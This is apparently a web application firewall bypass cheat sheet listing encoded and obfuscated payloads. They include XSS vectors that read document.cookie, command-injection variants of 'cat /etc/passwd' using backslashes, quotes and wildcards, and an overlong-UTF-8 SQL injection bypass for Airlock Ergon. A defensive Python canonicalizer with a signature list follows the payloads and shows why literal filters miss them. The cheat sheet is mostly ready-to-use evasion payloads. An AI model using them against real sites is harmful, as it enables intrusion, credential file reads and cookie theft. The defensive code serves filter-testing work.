Generic techniques
- Base64 encoding our payload (/?q=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=>)
- ASPX removes % not followed by two hex characters (https://site.com/index.php?%file=cat /etc/paswd)
- We can use spaces to fool a WAF (<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">)
- Backslashes in filtered words (https://site.com/index.php?file=cat /etc/pa\swd)
- Quotes and * in filtered words:
  - https://site.com/index.php?file=cat /etc/pa*swd
  - https://site.com/index.php?file=cat /etc/pa**swd
  - https://site.com/index.php?file=cat /etc/pa's'wd
  - https://site.com/index.php?file=cat /etc/pa"s"wd
- Wildcards (https://site.com/index.php?file=cat /e??/p????)
- Replace spaces with / (<svg/onload>)
- Custom tags (https://acd91f8b1e2bae3781d35fe600c30081.web-security-academy.net/?search=<CUSTOM+id%3Dx+onfocus%3Dalert(document.cookie) tabindex=1>#x)
- Using look-alike characters from other alphabets, e.g. ē instead of e
Airlock Ergon
%C0%80'+union+select+col1,col2,col3+from+table+--+
Every space here is replaced by a + and the URL-encoded values %C0 and %80 are placed at the beginning of the attack vector.
By @Sec Consult
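As an added example (not code from the original story), a defender-side canonicalizer that shows why each of the generic evasions listed above, and the Airlock %C0%80 prefix, slips past a filter that matches literal signatures: the filter inspects the raw parameter while the backend interprets a normalized one. The signature list and the sample request fragments are constructed for the demonstration and assume the value is checked after the same decoding the backend performs.

```python
import base64, re, unicodedata
from urllib.parse import unquote_to_bytes

# Literal signatures a naive filter matches against the raw query string (constructed list).
SIGNATURES = ("<script", "onerror", "onload", "onfocus", "/etc/passwd", "union select")

def canonicalize(raw: str) -> str:
    """Rewrite a parameter into the form the backend will effectively act on."""
    # ASPX-style: a '%' not followed by two hex digits is dropped, not passed through.
    s = re.sub(r"%(?![0-9A-Fa-f]{2})", "", raw)
    # Decode '+' and %XX; an overlong sequence such as %C0%80 is not a character and vanishes.
    s = unquote_to_bytes(s.replace("+", " ")).decode("utf-8", "ignore")
    # Append the decoded markup of any base64 data: URI so it is inspected as well.
    for m in re.finditer(r"data:[^,;]*;base64,([A-Za-z0-9+/=]+)", s):
        try:
            s += " " + base64.b64decode(m.group(1), validate=True).decode("utf-8", "ignore")
        except ValueError:
            pass
    # Fold accented look-alikes (ē -> e) and case.
    s = unicodedata.normalize("NFKD", s)
    s = "".join(c for c in s if not unicodedata.combining(c)).lower()
    # Quoting the shell strips before the command runs: backslashes, '' and "".
    s = re.sub(r"[\\'\"]", "", s)
    # HTML tolerates '/' and any amount of whitespace between tag name, attributes and '='.
    s = re.sub(r"\s+", " ", s)
    s = re.sub(r"<([a-z][a-z0-9]*)[\s/]+", r"<\1 ", s)
    return re.sub(r" ?= ?", "=", s).strip()

def flagged(raw: str) -> list:
    """Signatures hit by the canonical form; shell wildcards (* and ?) are matched as globs."""
    canon = canonicalize(raw)
    hits = [sig for sig in SIGNATURES if sig in canon]
    for tok in canon.split():
        if "*" in tok or "?" in tok:
            pat = re.escape(tok).replace(r"\*", ".*").replace(r"\?", ".")
            hits += [sig for sig in SIGNATURES if sig not in hits and re.fullmatch(pat, sig)]
    return hits

# Constructed request fragments modelled on the evasions listed above.
SAMPLES = {
    "base64 data uri": "q=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=>",
    "spaces in tag": '<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">',
    "backslash": "file=cat /etc/pa\\sswd",
    "quotes": "file=cat /etc/pa's'swd",
    "wildcards": "file=cat /e??/p?????",
    "slash separator": "<svg/onload=alert(1)>",
    "look-alike char": "<img src=x onērror=alert(1)>",
    "overlong utf-8": "%C0%80'+union+select+col1,col2,col3+from+table+--+",
}
```

None of the sample fragments contains its signature as a literal substring, which is exactly what a raw-string match misses; `flagged()` reports the hit only after canonicalization.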